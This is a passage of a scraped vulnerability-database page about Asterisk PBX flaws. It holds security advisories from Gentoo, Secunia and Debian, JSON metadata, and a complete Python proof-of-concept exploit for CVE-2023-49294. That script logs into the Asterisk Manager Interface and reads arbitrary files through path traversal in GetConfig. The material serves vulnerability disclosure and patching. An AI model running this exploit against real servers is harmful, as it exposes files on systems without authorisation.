http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. This fixes some\nvulnerabilities, which can be exploited by malicious people to cause\na DoS (Denial of Service). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201006-20\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: Normal\n     Title: Asterisk: Multiple vulnerabilities\n      Date: June 04, 2010\n      Bugs: #281107, #283624, #284892, #295270\n        ID: 201006-20\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in Asterisk might allow remote attackers to\ncause a Denial of Service condition, or conduct other attacks. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package            /  Vulnerable  /                    Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/asterisk      \u003c 1.2.37                         \u003e= 1.2.37\n\nDescription\n===========\n\nMultiple vulnerabilities have been reported in Asterisk:\n\n* Nick Baggott reported that Asterisk does not properly process\n  overly long ASCII strings in various packets (CVE-2009-2726). \n\n* Noam Rathaus and Blake Cornell reported a flaw in the IAX2 protocol\n  implementation (CVE-2009-2346). \n\n* amorsen reported an input processing error in the RTP protocol\n  implementation (CVE-2009-4055). \n\n* Patrik Karlsson reported an information disclosure flaw related to\n  the REGISTER message (CVE-2009-3727). \n\n* A vulnerability was found in the bundled Prototype JavaScript\n  library, related to AJAX calls (CVE-2008-7220). \n\nImpact\n======\n\nA remote attacker could exploit these vulnerabilities by sending a\nspecially crafted package, possibly causing a Denial of Service\ncondition, or resulting in information disclosure. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Asterisk users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=net-misc/asterisk-1.2.37\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\navailable since January 5, 2010. It is likely that your system is\nalready no longer affected by this issue. \n\nReferences\n==========\n\n  [ 1 ] CVE-2009-2726\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726\n  [ 2 ] CVE-2009-2346\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346\n  [ 3 ] CVE-2009-4055\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4055\n  [ 4 ] CVE-2009-3727\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3727\n  [ 5 ] CVE-2008-7220\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7220\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-201006-20.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2010 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nAsterisk IAX2 Call Number Exhaustion Denial of Service\n\nSECUNIA ADVISORY ID:\nSA36593\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36593/\n\nDESCRIPTION:\nA vulnerability has been reported in Asterisk, which can be exploited\nby malicious people to cause a DoS (Denial of Service). \n\nS800i (Asterisk Appliance):\nUpdate to version 1.3.0.3. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n* Noam Rathaus\n* Blake Cornell\n\nORIGINAL ADVISORY:\nhttp://downloads.asterisk.org/pub/security/AST-2009-006.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nThe vulnerabilities are caused due to \"sscanf()\" being invoked\nwithout specifying a maximum width e.g. when processing SIP messages. \nThis can be exploited to exhaust stack memory in the SIP stack network\nthread via overly long numeric strings in various fields of a\nmessage. \n\nNOTE: According to the vendor this is only potentially exploitable in\n1.6.1 and above",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "BID",
        "id": "36275"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "db": "PACKETSTORM",
        "id": "75661"
      },
      {
        "db": "PACKETSTORM",
        "id": "80978"
      },
      {
        "db": "PACKETSTORM",
        "id": "81677"
      },
      {
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "db": "PACKETSTORM",
        "id": "81003"
      },
      {
        "db": "PACKETSTORM",
        "id": "80408"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-2346",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "36275",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "36593",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1022819",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591",
        "trust": 0.8
      },
      {
        "db": "BUGTRAQ",
        "id": "20090903 AST-2009-006: IAX2 CALL NUMBER RESOURCE EXHAUSTION",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-2346",
        "trust": 0.1
      },
      {
        "db": "SECUNIA",
        "id": "34229",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "75661",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "80978",
        "trust": 0.1
      },
      {
        "db": "SECUNIA",
        "id": "36889",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "81677",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90288",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "81003",
        "trust": 0.1
      },
      {
        "db": "SECUNIA",
        "id": "36227",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "80408",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "db": "BID",
        "id": "36275"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "PACKETSTORM",
        "id": "75661"
      },
      {
        "db": "PACKETSTORM",
        "id": "80978"
      },
      {
        "db": "PACKETSTORM",
        "id": "81677"
      },
      {
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "db": "PACKETSTORM",
        "id": "81003"
      },
      {
        "db": "PACKETSTORM",
        "id": "80408"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "id": "VAR-200909-0357",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.19659443
  },
  "last_update_date": "2024-11-23T21:05:16.396000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "AST-2009-006",
        "trust": 0.8,
        "url": "http://downloads.asterisk.org/pub/security/AST-2009-006.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/36275"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/36593"
      },
      {
        "trust": 1.7,
        "url": "http://securitytracker.com/id?1022819"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/506257/100/0/threaded"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2346"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-2346"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/506257/100/0/threaded"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.3,
        "url": "http://www.asterisk.org/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/506257"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/34229/"
      },
      {
        "trust": 0.2,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.2.diff.txt"
      },
      {
        "trust": 0.2,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.4.diff.txt"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2346"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/36227/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/36593/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-002.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/try_vi/"
      },
      {
        "trust": 0.1,
        "url": "https://issues.asterisk.org/view.php?id=12912"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-006.html"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.0.diff.txt|1.6.0"
      },
      {
        "trust": 0.1,
        "url": "http://www.beyondsecurity.com/ssd.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.rfc-editor.org/authors/rfc5456.txt"
      },
      {
        "trust": 0.1,
        "url": "http://www.asterisk.org/security"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.1.diff.txt|1.6.1"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-006.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/36889/"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/archives/fedora-package-announce/2009-september/msg00783.html"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3727"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3727"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/glsa/glsa-201006-20.xml"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-7220"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-7220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2726"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.0.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.1.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-1.4.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.0.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.2.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://labs.mudynamics.com/advisories/mu-200908-01.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2009-005.html"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.1.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-1.2.diff.txt"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2009-005-trunk.diff.txt"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "db": "BID",
        "id": "36275"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "PACKETSTORM",
        "id": "75661"
      },
      {
        "db": "PACKETSTORM",
        "id": "80978"
      },
      {
        "db": "PACKETSTORM",
        "id": "81677"
      },
      {
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "db": "PACKETSTORM",
        "id": "81003"
      },
      {
        "db": "PACKETSTORM",
        "id": "80408"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "db": "BID",
        "id": "36275"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "PACKETSTORM",
        "id": "75661"
      },
      {
        "db": "PACKETSTORM",
        "id": "80978"
      },
      {
        "db": "PACKETSTORM",
        "id": "81677"
      },
      {
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "db": "PACKETSTORM",
        "id": "81003"
      },
      {
        "db": "PACKETSTORM",
        "id": "80408"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-09-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "date": "2009-09-03T00:00:00",
        "db": "BID",
        "id": "36275"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "date": "2009-03-11T08:30:33",
        "db": "PACKETSTORM",
        "id": "75661"
      },
      {
        "date": "2009-09-04T01:28:46",
        "db": "PACKETSTORM",
        "id": "80978"
      },
      {
        "date": "2009-09-28T05:54:05",
        "db": "PACKETSTORM",
        "id": "81677"
      },
      {
        "date": "2010-06-04T05:34:39",
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "date": "2009-09-04T15:24:50",
        "db": "PACKETSTORM",
        "id": "81003"
      },
      {
        "date": "2009-08-17T09:58:53",
        "db": "PACKETSTORM",
        "id": "80408"
      },
      {
        "date": "2009-09-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "date": "2009-09-08T18:30:00.203000",
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "date": "2015-04-13T22:21:00",
        "db": "BID",
        "id": "36275"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "date": "2009-09-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "date": "2024-11-21T01:04:39.463000",
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "90288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk Open Source of  IAX2 Service disruption in protocol implementation  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      }
    ],
    "trust": 0.6
  }
}

var-202312-2340

Vulnerability from variot

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

Date: 2023-03-26

Exploit Author: Sean Pesce

Vendor Homepage: https://asterisk.org/

Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

Version: 18.20.0

Tested on: Debian Linux

CVE: CVE-2023-49294

!/usr/bin/env python3

Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

to the common INI configuration format.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-49294

https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

import argparse import getpass import socket import sys

CVE_ID = 'CVE-2023-49294'

DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB

def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)

def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp

if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()

# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
    args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')

print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)

# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))

# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)

# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
    login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
    print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
    sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)

# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
    'ActionID': args.action_id,
    'Filename': f'{traversal}{args.file}',
    #'Category': 'default',
    #'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
    resp = tcp_send_rcv(sock, b'')

print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')

if b'Error' in resp:
    sys.exit(1)

pass  # Done

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq

Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE-2023-37457

The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.

CVE-2023-38703

PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.

CVE-2023-49786

Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
